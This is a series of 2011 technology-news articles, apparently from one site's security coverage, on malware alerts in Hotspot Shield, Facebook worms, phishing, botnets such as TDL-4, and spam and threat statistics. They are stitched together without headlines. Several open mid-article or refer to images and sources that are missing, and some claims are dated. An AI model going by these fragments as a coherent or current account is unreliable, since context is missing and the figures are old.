AnchorFree, makers of the powerful Hotspot Shield application, are adding a new function to its offering today. When browsing the Web, Hotspot Shield will now alert users when a site they visit contains malware. It may seem a trivial update to for the malware-invincible iOS but there is more danger than meets the eye.

For those unfamiliar with Hotspot Shield, it is a service that can create a mobile virtual private network (VPN) from anywhere. The purpose of this is to encrypt a users browser activity with an HTTPS connection. In many countries, Hotspot Shield is used to get around censorship laws and blocked websites. For instance, Hotspot Shield made a name for itself in 2011 by allowing users to access restricted sites during the uprisings associated with the Arab Spring.

"AnchorFree is not about protecting your device, it is about protecting your browsing," Gorodyansky told ReadWriteWeb. "We protect all of your traffic, and we do it through the cloud."

The free version of Hotspot Shield protects users from 1.5 million malware threats. Users of Hotspot Shield Elite and mobile app (which is free with a monthly service charge) receive protection against an additional 1.5 million threats. Those include malware sites, malware-infected sites riddled with Trojans, phishing sites looking for user passwords as well as content farms and spam. When a user visits one of these types of sites through the browser, Hotspot Shield will alert the user to the danger and direct them away from the page (or allow them to click through if they are insistent).

Hotspot Shield has 10 million monthly users and is available on iPhone, iPad, iPod Touch or a PC. Gorodyansky said that the next launch set for AnchorFree will be to brand into the world of Android.

AnchorFree recognizes that there are many ways a user can come to harm on the Internet. Mobile malware is not just something found in third-party app stores or from time to time in the Android Market. The fundamental basis of smartphones are that they are devices that can access the Web. The beauty and power of the Web is that it knows few restrictions. AnchorFree not only wants to allow users to break through those restrictions, but also protect them against the inevitable dangers that is inherent with that freedom.

"What was once malware designed to steal data from financial institutions has evolved into a social network threat," says John Weinschenk, CEO at Cybersecurity company Cenzic. "Bank account numbers and Facebook log-in credentials seem very different, but to hackers, they are equally as lucrative."

Once Ramnit joined forces with the leaked ZeuS source-code in May, the Seculert blog says it became a "Hybrid creature." That is, it took on ZeuS' financial-data investigative nature and gained access to financial institutions. As a result, it compromised online banking sessions and also attacked a few corporate networks. The Ramnit worm burrows through Facebook, spreading malware to the walls of thousands of innocent Facebook users.

"To combat these types of threats, consumers need to be vigilant about changing passwords often," says Weinschenk. "Avoid clicking on unknown links, and alert their friends to a potential malicious link they might have posted."

Facebook spam attacks like this are nothing new. A recent attack that was caused by a browser vulnerability filled users' walls with photos of the Biebs in compromising sexual situations. Not long after, football-loving spammers nailed the Facebook community forum.

Users should keep an eye on their Facebook profiles as social network worms continue spreading.

Facebook says it blocks 200 million malicious actions per day, which include messages that send users to malware. Even still, Facebook spam is growing faster than its user base.

Source: Intego

The sign-in page asks for users profile information, including the credit card information that is tied to an Apple ID account.

One of the first rules users should be aware of when checking for malware and spam in email is to hover over a suspicious URL with to see the location of the URL they are about to click. Tell tale signs of phishing, malware and malicious sites are when the URL does not appear to be headed to an official page from the company in question.

The phishers behind this attack have likely been sitting on it a while, waiting for when users received new Apple products during the holiday season. Malware makers are very sensitive when it comes to the timing of attacks. Zero day hacks are often stockpiled and unleashed when the impact will be optimal. Other malware and spam attacks are saved up for big news stories, such as what was seen during the Japan earthquake in 2011 or the death of Osama bin Laden. Spammers will then hit search engines with poisoned results and attempt to fill email inboxes with links to malicious sites. While the phishing attack aimed at Apple users was not a zero day attack, it is an example of phishers knowing when the best times are to launch an offensive.

Did you encounter an email similar to this last week? What other phishing attempts have been made against your inbox recently? Let us know in the comments.

As you can see from a snippet of its dashboard, you are informed about friends who haven't recently used their accounts in some time (that could be possible spammers, or it could just be a false positive and someone who has grown disenchanted with Tweeting); any links that point to nasty places on the Net; other obvious threats that are detected; and other warnings. You can set it up to warn you weekly, or let your friends know that they accounts have been compromised (I would suggest not doing that for the moment, until the tool is further developed),and to scan your private messages. It will take several minutes to process your entire Twitter stream, depending on how many followers and messages you have.

It certainly can't hurt to have someone of BitDefender's caliber looking over your shoulder at your Tweets, and it can help in some cases to have this form of protection. And it is free.

"The days of just buying and anti-virus or a firewall program and just putting it on a PC are over," said SonicWall's VP of corporate development Ed Cohen. Enterprises and small and medium business need a more layered approach to security. Yet, the layers need to be more sophisticated. With the growing complexity of corporate networks, a new approach is needed.

SonicWall's report cites the growing problem of securing networks from social applications and mobile devices. These are new problems within the last several years that corporate networks have not yet caught up with. Cohen uses the example of Facebook, which has become a necessity for enterprises. Yet, monitoring when, where and how employees Facebook or other similar applications is necessary for enterprise security. For instance, a business's marketing department needs to use Facebook but it should not be allowed to use applications within the platform, like MafiaWars.

There is also the growing ubiquity of mobile devices and workers accessing the corporate network. That includes workers accessing work data from their smartphones or remote workers tapping in from unsecured connections.

"The more access that companies give, the more vulnerable they are," Cohen said. "Yet, at the end of the day, access and productivity often trump security."

Cohen advises that consumers, corporations and small to medium businesses become more proactive with security. That includes more monitoring of how and when users are accessing their work data, installing sophisticated anti-virus programs, next-generation firewalls and filters that look scan for spyware, spam, Web vulnerabilities etc.

"It always surprises me when a small business says that it has an anti-virus program but asks why it also needs to get a firewall," Cohen said.

Cohn has four recommendations to effectively secure a business network.

• Protect the network - That classic fortress approach where firewalls, black lists and security programs monitor the network itself.
• Protect the endpoints - This includes securing computers making remote connections to the network, from using Secure Socket Layer and Virtual Private Networks to make sure that every smartphone, tablet or computer that can access work data has an anti-virus client.
• Back up data - This is an old standby credo of the security profession (or anybody that has ever used a computer), but Cohen says individuals and companies often do not do a good job of backing up data. There are a variety of new products and services that can help companies automatically back up their data in case of crash or breach.
• Use managed service providers - This is a trend in enterprise that has grown in the last several years, especially when it comes to mobile devices. If you do not know how or cannot effectively manage your network, hire somebody else to help you do it.

SonicWall has an interesting quiz about detecting phishing attempts that it says most people fail miserably. Head on over an take the quiz and let us know how you did. It is a lot harder to detect phishing than even sophisticated users think (this reporter got six out of 10 correct and apparently that is a good score).

Here is a sample of the quiz. Is this phishing or legit?

Answer: Phishing

Android is now far and away the leader is mobile malware. For-profit mobile malware has also grown significantly, with SMS-sending Trojans and other complex Trojans compromising smartphones. Rootkit malware that takes over the operating kernel of a computer or a smartphone is also becoming popular among malicious programmers. As McAfee notes, "The second quarter of the year was clearly a period of chaos, changes and new challenges."

Android mobile malware has become a persistent threat. Earlier in the year the press covered every new iteration of Android malware, starting with DroidDream and jumping every time a smartphone sneezed. Now, just as with PC malware, Android malware is a usual occurrence. Some of the top Android malware Trojans and viruses out there are derivates of DroidDream. That makes a lot of sense as malware is known to morph significantly when it is out in the wild as new programmers get their hands on it and change it to their specific needs (or, just enough to slip through security applications). Security programmers should look out for Android malware in the DroidKungFu family, the DrdDreamLite family and Tcent, which sends text messages to premium services.

For the first half of 2011, malware is at its highest rate ever. Though, if you just take the second quarter into account, it is a touch behind the pace of 2010. Overall this year malware is up 22%. McAfee's library of malware will reach 75 million entries by the end of the year.

One of the most common targets has been Adobe, which now outpaces Microsoft in attracting exploits. That is another knock to Adobe, which has been struggling in the market to create new products that actually run effectively on computers and mobile devices.

McAfee's report covers a sprawl of different types of malware, spam, phishing and social engineering, mobile viruses and malware, and botnets. Reading through the report, it is no wonder that the security companies should be beginning to question themselves and whether or not they can keep up with the flood of malicious activity on the Internet. On one hand, the popular refrain is always "exercise common sense and you will be secure", but motivated hackers have almost no trouble isolating people and companies if they really want to get their information.

The question has to be asked: Is the security industry failing us?

You may recognize the programs. They go by names like "Vista Security 2012," "XP Antispyware 2012" and "Mac Defender." Yet, according to Enigma Software, these scareware programs are on the decline. In June, the FBI raided malicious programmers 12 countries including the U.S. and arrested ChronoPay's CEO Pavel Vrublevsky, whose Russian payments company was believed to be behind many of the applications.

Engima does not make mention of Mac Defender, but the malicious program was one of the first widespread Trojans to target Apple computers. Apple moved quickly to fix the problem with a series of security updates earlier this year. Apple is not known to issue weekly patches but the existence of these type of malware applications may force it in the future to be more proactive about security.

The way the FBI raids effectively cut down on scareware programs was to go after their payments systems.

"The FBI raids cut off the ability for the scareware makers and distributors to get paid and when they can't get paid by their victims, they shrivel up and go away," Enigma wrote.

Enigma is prudent in saying that, while the instances of these programs are down, it is likely a temporary cycle in the war against malware.

"Sadly, cybercriminals and scareware makers are smart. They're very good at what they do. And we have no doubt that sometime soon, they'll be back. They'll figure out another way to get their scareware out and to get paid by their victims. We expect that another cyber gang is going to step in and fill that void," the company wrote.

Image Sources: Enigma Software

That is up for debate. A Google security researcher (acting independently of Google) named Tavis Ormandy reverse engineered part of security firm Sophos's security products and published his research (PDF). He presented his findings at the Black Hat security conference in Las Vegas yesterday and had some hearty criticism not just for Sophos, but for the security industry in general. The issue, in part, is about how open security companies are with the codes and algorithms they use to protect users' computers. How open do security companies need to be to have the most effective product?

Kerckhoff's Principle

Ormandy starts the abstract of his paper with a fairly simple declaration:

"Antivirus vendors often assert they must be protected from scrutiny and criticism, claiming that public understanding of their work would assist bad actors. However, it is the opinion of the author that Kerckhoffs's principle applies to all security systems, not just cryptosystems. Therefore, if close inspection of a security product weakens it, then the product is flawed."

The notion is that security companies hide their algorithms, codes and practices so that the bad actors will not be able to study them and easily sidestep them. Kerckhoffs' principle (from 19th century cryptographer Auguste Kerckchoffs) states: "A cryptosystem should be secure even if everything about the system, except the key, is public knowledge."

What Ormandy did with Sophos was pick apart a couple different subsections of the overall security product, including parts of Sophos's cryptology and obfuscation practices that it uses to protect data. Specifically, Ormandy looked at Sophos's buffer overflow protection, signature matching and cryptography (SPMAA, proprietary to Sophos) and its "genes and genotypes" product that detects the behavior of malicious programs.

Only A Piece Of The Puzzle

Sophos researcher and blogger Graham Cluley said that Ormandy is not an ordinary security engineer or computer user.

"No doubt he is a very bright chap," Cluley said in a call to ReadWriteWeb. "I think he comes at this problem from a very unusual angle. I imagine he is the type of fellow who analyzes every piece of code that he puts on his computer ... That is not something that scales. Tavis's mom could not do that."

Yet, Cluley notes that while what Ormandy did was helpful and informative for Sophos, it was only a piece of the company's larger security product. Cluley notes that Ormandy did not actually test the product against malware and that if he did he would have found that it is quite capable of blocking malicious programs.

Yet, Ormandy does have some pertinent points and Sophos is right to acknowledge them. The security vs. cyber-criminal battle is a two-step, a dance where one actor tries to take a step ahead of the other. If a hacker has specific knowledge of how the company detects malware and encrypts data, they have the advantage. A Sophos researcher that attended Ormandy's talk downplays that aspect.

"Malware writers have to be very generic in terms of what they write," Sophos researcher Vanja Svajcer said, according to Forbes. "They don't have time to investigate forty or fifty vendors to circumvent their products."

In general, that is true. Malware writers are interested in the richest targets available with the lowest barrier to success. Yet, that does not preclude any specific hacker from studying the weaknesses of a particular security product and finding ways around it. Spear phishing, attacks designed to exploit specific targets (nominally through some type of social engineering like email) is on the rise and as we have seen with the attacks against Sony, Booz Allen Hamilton and the state of Arizona by LulzSec and Anonymous, dedicated attacks can be successful. As much as the security industry likes to tout their own products (which are effective for the most part), they are not perfect. Part of what Ormandy is doing with Sophos is pointing that out. At the same time, even the best security products cannot protect against employees not following best practices and poorly instituted security policies, which is often the case in large-scale hacks, such as Sony or HB Gary.

Not Cluley v. Ormandy: Round 2

Cluley wanted to point out that Ormandy's latest criticism of Sophos products was not another case of "Ormandy v. Cluley." Last year Ormandy published zero-day vulnerabilities in Microsoft's code that led to attacks. Cluley slammed Ormandy for not giving the security industry or Microsoft enough time to respond to the vulnerability. Cluley says that is not the case this time around.

"This is not some Ormandy v. Cluley feud," Cluley said. "One of the things about this is that Tavis and Sophos have been working really closely together. It has been a friendly and open process."

Cluley responded to Ormandy's findings in a blog post at Naked Security stating that the cryptography algorithm that Ormandy found to be "weak" was being phased out and that the company is working to fix the other vulnerabilities in the next version of its product.

Yes, You Can Trust Your Security Companies

Yet, the question remains: can the security companies be trusted? In short, yes. For the most part, security products are an effective way to detect and eliminate malware. Some products are better than others. That does not excuse the industry from, at times, creating hype or fear (as an industry, not specifically Sophos) in reference to certain exploits. It is decent business sense - scare people in to buying your product. Cluley says that the security companies have been guilty of that in that past and he hopes the industry is more responsible recently.

"I think industry has gotten better and more responsible. The thing that fascinates me is that you are stuck between a rock and a hard place," Cluley said. "You want people to wake up and stop clicking on naked pictures of Angelina Jolie. Still, we have to get the message out there."

Google announced today that this extra net of protection will be available to the rest of the world as 2-step verification is being released in 40 languages across the globe. This has a potential to be a boon for the security industry and Google account holders across the world that are perpetually under attack from malware and phishing attacks attempting to access sensitive information.

Yet, that it just Google and its data centers. Individual users are more susceptible to phishing and malware attacks, especially as they become more targeted. That is where 2-step verification is a critical layer to protect sensitive information. Think about the attack on Booz Allen Hamilton that leaked 90,000 Department of Defense oriented emails several weeks ago by Anonymous. The hactivist group bragged that it was easy to crack Booz Allen Hamilton, apparently through one particular unprotected server. Once they were in, they could not be stopped. The server was dumped and Anonymous had all the information it needed to make Booz Allen Hamilton look extremely foolish.

Likely, this would not have happened if Booz Allen Hamilton had the type of protection that is provided by the major public cloud operators like Google or even Microsoft's Azure. Yet, the private cloud or data center that Booz Allen Hamilton used was not sufficient to keep the hackers out.

While Google's 2-step verification initiative is an interesting function in how it protects Google accounts, it should be looked towards as a guideline to be built upon, especially when adding security in the enterprise or a government agency. Making security layered and universal between the public and enterprise is the first step to eliminating the botnets that cause so much headache on the Internet. Rolling out 2-step verification to 40 languages should only be a step to making it a global standard across the globe.

Blue Coat security released an infographic this morning that makes it easy to understand how your computer is becoming infected with malware and what botnets are delivering it. For instance, did you know that "image search is the most dangerous activity users can engage in on the web"? Or that Shnakule is the biggest malware network out there currently with an average of 2,001 unique hosts a day? Hit the jump for the full infographic.

Expect that to change in coming years as social networking spam becomes more prevalent. At the same time, do not think that porn malware is going anywhere. Porn is huge on the web, a rabbit hole that is only getting deeper.

Check out the infographic for full details.

Data security company Imperva released research today that says Web applications are probed or attacked 27 times an hour, or once every two minutes. At the peak of attacks, some Web applications see probes or attacks 25,000 times an hour, or seven times per second. The research gives concrete numbers to what security researchers, governments and enterprises have known for a while - their networks are persistently under attack.

When researchers look for malware and attack vectors, the tendency is to look for vulnerabilities in portals or code. Yet, most of the major data breaches in recent news have been the result of attacks on Web apps like email and data systems. The goal for hackers is to break applications with automated attacks searching for vulnerabilities until the apps crack and spill data straight into the hands of the hackers.

Imperva says that 61% of attacks originate from botnets in the U.S. Yet, that does not mean that those doing the actual attacks are located in the U.S. When botnet controllers are looking to hit a specific target, they want to use computers closest to their bounty. The important thing about the attacks coming from the U.S. is that a lot of American's computers are infected with malware, thus part of some botnet. For instance, if hackers want to attack the U.S. government, the command-and-control center of the botnet might activate the 1,000 computers closest to Washington, D.C. About 10% of attacks originated from China, with Sweden and France also large contributors. China makes sense for its raw number of hackers while Sweden has some of the most universal and robust broadband in the world.

The large number of attacks stems from botnet automation. Imperva said that it sees patterns where applications will be attacked with heavy bursts of many thousands of attacks per hour followed by lighter periods of activity. In essence the criminal hackers are looking to break the application quickly by testing a lot of known vulnerabilities. If it doesn't crack, their eyes turn elsewhere (criminal hackers are notorious for looking for easy targets). They automate the attacks before coming back for another look.

While Imperva was not specifically monitoring the Lulz Security attacks at their peak in June, they noted that they were very similar to what its research had turned up. A "hack" is an esoteric term. As far as the general public knows, the attacks were some complicated computer stuff that led to data being stolen. Yet, security researchers see four common types of attacks, what Imperva calls "the unfab four": directory traversal, cross-Site Scripting, SQL injection and remote file inclusion (RFI). These attacks come in two waves: scan and exploit. An attacker may use directory traversal and cross-site ccripting during a scan phase and then hit it with an SQL injection or an RFI in the exploit phase.

Overall, Imperva's findings are a great illumination of Advanced Persistent Threat (APT). The company recommends that agencies and corporations become familiar with how to stop deter automated attacks and perform their own "scans" to detect known vulnerabilities. If companies are on top of knowing their security weaknesses and communicate with the security community, APT attacks can be withstood and ultimately turned against the criminals perpetrating them.

VirusBarrier is designed to scan attachments in users' email through the cloud to determine if they are carrying malware that could harm a users' computer. Security company Intego designed the app to keep malware from spreading from mobile devices to computers where it could do more harm than if it were couched in the kernel of an iPhone. VirusBarrier is one of the first malware scanners designed for iOS devices. How big of a problem is spreading malware from mobile devices to computers? Is an app like VirusBarrier even necessary?

Employees often check their email from their mobile devices like iPads and iPhones and malware spreading through the enterprise could only be a matter of plugging that phone into to a computer or forward a malicious email to a colleague.

VirusBarrier follows trends used by other security companies such as Symantec and Lookout when it comes to mobile security by running scans in the cloud. Anti-malware applications are computing intensive and take up resources on hard drives, which is not practical for mobile devices running flash memory on limited processors. Hence, Intego runs security scans from the mobile device into the cloud where attachments are scanned against the company's database of malware definitions. The use of the cloud enables applications to have access to vast libraries of security company's malware definitions without using the limited resources available on tablets or smartphones.

The average user that does not get a lot of emails probably does not have a lot of use for an app like VirusBarrier. Yet, for power users checking their emails all day and connecting to lots of people through their iPhones, it is a useful application to have around. It is available in the App Store for $2.99, which includes a 12-month subscription to Intego's malware dictionary.

Search engine poisoning is the most prevalent form of malware delivery on the Web, according to the security researchers at Blue Coat. In its 2011 Mid-Year Security Report Blue Coat outlined the biggest threats to Web security and the attack vectors that malware providers are using to infiltrate users' computers.

Search engine poisoning (SEP) makes up 40% of malware delivery vectors on the Web. The practice is when malware and spam attackers inundate search results with links to bait pages that will take users to malicious websites that will download malware to a computer. Spammers reach higher in search rankings by creating link farms that drive their poisoned pages further up search results. People want to be able to trust that what they search for in Google, Bing or Yahoo is safe to click on. Users are not conditioned to think that search results could be harmful to the health of their computers. The other leading attack vectors on the Web all pale in comparison to SEP, with malvertising, email, porn and social networking all 10% of malware delivery.

Google and security companies are in a giant game of whack-a-mole with the malware creators, said the head of Blue Coat's malware research team, Chris Larsen. The botnet networks that create malware are constantly shifting and their delivery mechanisms grow evermore sophisticated.

Yet, SEP attacks do not fundamentally change, they just evolve. As an example, Larsen points to the killing of Osama Bin Laden and the mass of searches that were created the day after the announcement was made to the world. The malware creators used their existing infrastructure, changed the signatures of the command-and-control servers and unleashed a mass of bait links onto the Web.

Malware attackers have come to recognize that users are more wary of clicking on suspicious links that promise something unbelievable or outrageous. So, the vector is shifting to image search. Images are much harder to guard against and have proven to be fertile soil for malware providers. It is harder for Google and the security companies to find the "link farm" that creates the poisoned search results in images.

Porn, Malvertising and Email Remain Strong

In the table above, "unrated" includes malvertising - the practice of poisoning ads on the Web that lead to "bait pages" in much the same way as SEP does. The Blue Coat report notes "people like to look at other people and human nature is unlikely to change." There have been spikes of up to 11,000 new porn sites a day, which makes the need for real-time Web defense systems tantamount. Yet, porn as a delivery vector has actually fallen in Blue Coat's rankings, falling behind email since the last report the company issued in February. Symantec reported last week that email spam was at one its lowest level since 2008 so it looks like the overall amount of malware on the Web may be decreasing.

Larsen cautions that might not be the case. Malware vectors are cyclical by nature. The changing nature of botnets make it difficult to determine exactly how much malware is being driven from what sources. Botnets are becoming more difficult to identify and are increasingly sharing (or simply overlapping) resources. On one hand, the more sophisticated the botnet, the harder it is to dismantle. Yet, Larsen thinks that the more complex botnets become, the more vulnerable they become.

The Changing of Botnets

"The network is constantly changing," Larsen said. "The bigger the attack surface, the more vulnerabilities are created in their own networks."

The Web is a large, complex place made up of many different standards and approaches. Hackers take advantage of this complexity by exploiting weaknesses in portals that are not secure. Larsen thinks that the more complex botnets become, the more portals are opened where security companies can worm into the networks and take them down.

Botnets are also beginning to share nodes on their networks. According to the report; "Many botnets are known to intersect and share their compromised nodes in a symbiotic relationship (which they do with more monetizable malware such as ransomware, pharmacy spam, scams and a variety of other exploits). The samples analyzed, sandboxed, researched and studied by Blue Coat Security Labs exhibit this characteristic."

In terms of malvertising, attackers are learning that patience pays. Malvertising networks will lay low within a legitimate ad network and develop clean reputations by passing multiple malware security sweeps. When the sleeping malvertising network awakes it will change the way it operates to deliver the users to a malware host. The next day the malvertising network will be gone, hiding somewhere else on the Internet.

The TDL-4 botnet is 4.5 million PCs strong. It has some unique features that make it difficult to remove such as a powerful rootlet exploitation and the ability to disable other malware that is installed on a computer. Those features make it difficult to detect and remove the malware, but that is not what makes the botnet indestructible. The way TDL-4 communicates with its command-and-control center and other infected computers is what makes it unique.

Users usually think using encryption to transfer data and messages is a good thing on the Internet. In general, it is (despite the headaches associated with implementing and maintaining HTTPS). TDL-4 uses encryption against security defenders by swapping the table created for outgoing HTTP requests and eventually converting it to HTTPS using Secure Socket Layers (SSL) to connect to the command-and-control server.

Here is how the Kaspersky team describes the process:

"This table is activated with two keys: the domain name of the botnet command and control server, and the bsh parameter. The source request is encrypted and then converted to base64. Random strings in base64 are prepended and appended to the received message. Once ready, the request is sent to the server using HTTPS."

Here is Kaspersky's breakdown of the 4.5 million infected computers:

Essentially, TDL-4 uses peer-to-peer networking that enables it to hide the command-and-control center and also move the server so that it does not have one centrally-identifiable location. It encrypts the P2P communication, making it nearly impossible to track.

The Malware That Kills Malware

In the wild, only the strong survive. TDL-4 recognizes that it is stronger than its competitors, but also the fact that its competitors' behavior provides a threat to detection.

Botnet malware doesn't want the user to know that it is hiding in the hard drive. That means digging deep into the rootkit and kernel of the machine and tricking the rest of the system that everything is just fine. Yet, less sophisticated malware has tell-tale signs that it has infected a user's device such as unusual packet bursts, slowing of the machine and general odd performance issues.

So, TDL-4 kills the competing malware. The malware is a bootkit that accesses a computer's MBR (master boot record). It does this to hide from security programs and increase the life-cycle of the malware. The TDL-4 code, known as TDSS, has the ability to delete the most common viruses found on a computer, such as Zeus. It then downloads its own malware, such as "fake antivirus programs, adware and the Pushdo spambot," according to Kaspersky.

Unique Behavior

P2P botnets are increasing and the evolution is making it harder to track and destroy the networks. TDL-4 uses a unique method - it uses a public KAD P2P network to send and receive queries. This helps the botnet stay decentralized while also acquiring new devices that are using KAD to share files and applications.

TDSS also works to "poison" search engine results and advertising networks, creating proxy affiliates that can help download the malware to computers. We will have more on malware using P2P and "search engine poisoning" next week.

A new report of security company Symantec says that global spam is at its lowest levels since 2008. The geographic center of spammed accounts has also shifted from Russia to Saudi Arabia. Worldwide spam is now down to one in every 1.37 emails. In the United States, spam accounts for 73.7% of all emails.

Spam levels are now the lowest they have been since McColo, a California-based ISP spam control center, was taken down in 2008. That is, in part, due to the shutdown of the spam-sending botnet Rustock in March 2011. Spam, phishing, viruses and other types of malware are all still major problems in the Internet ecosystem but it looks like progress is being made against the botnets and those that control them.

One of the most interesting trends to emerge from the June 2011 report is that pharmaceutical spam is declining yet the prefix "wiki" is increasing in spam messages. In some cases, the two have merged, such as the WikiPharmacy that spam messages are directing users to. Other major spam targets have been tax returns in India and fake aid to Japan after its catastrophic earthquake and tsunami in March. After pharmaceutical spam (which accounts for 40% of all spam messages), adult/sex/dating was the next highest category, with 19% of all messages.

The United States is also no longer a major generator of spam. Spam messages originating from the U.S. declined from 10.7% of all spam in 2010 to 2.8% in June 2011.

Spam may be at its lowest levels in three-plus years, but that does not mean it is dying out or is not a major problem. In June there were still 39.2 billion spam messages sent.

Phishing Evolves, Grows More Targeted

Email phishing is becoming more targeted. Spammers are now using tactics known as "spear phishing" and "whale phishing" designed specifically for a small set of users.

Our enterprise editor, David Strom, reports from Symantec's headquarters in Mountain View, Calif.

"The report shows that virus authors are getting better at micro-targeting: 75% of the malware has infected less than 50 or fewer individual PCs. One virus assembly kit called Harakit is distributed to an average of 1.6 users, meaning that it is used to deliver custom-built attacks that is targeted for a specific individual."

Examples such as Harakit might fit in with "whale phishing" where specific, high-ranking executives are targeted with phishing emails that have been dutifully researched by the phishers and are targeted to get into the executive's computer, which often has access to far more data than a mid-level employee.

South Africa is the most targeted location for phishing attacks with one in every 111.7 emails. The U.S. sees a phishing attempt in every 1,270 emails while Japan sees hardly any (in comparison) at all at with one in 11,179 emails.

Web-based malware is on the rise. MessageLabs identified an average of 5,415 sites each day harboring malware, adware and spyware, an increase of 70.8% from May 2011. That increases the chances of "drive-by" downloads where a user visits a site and becomes infected with malware.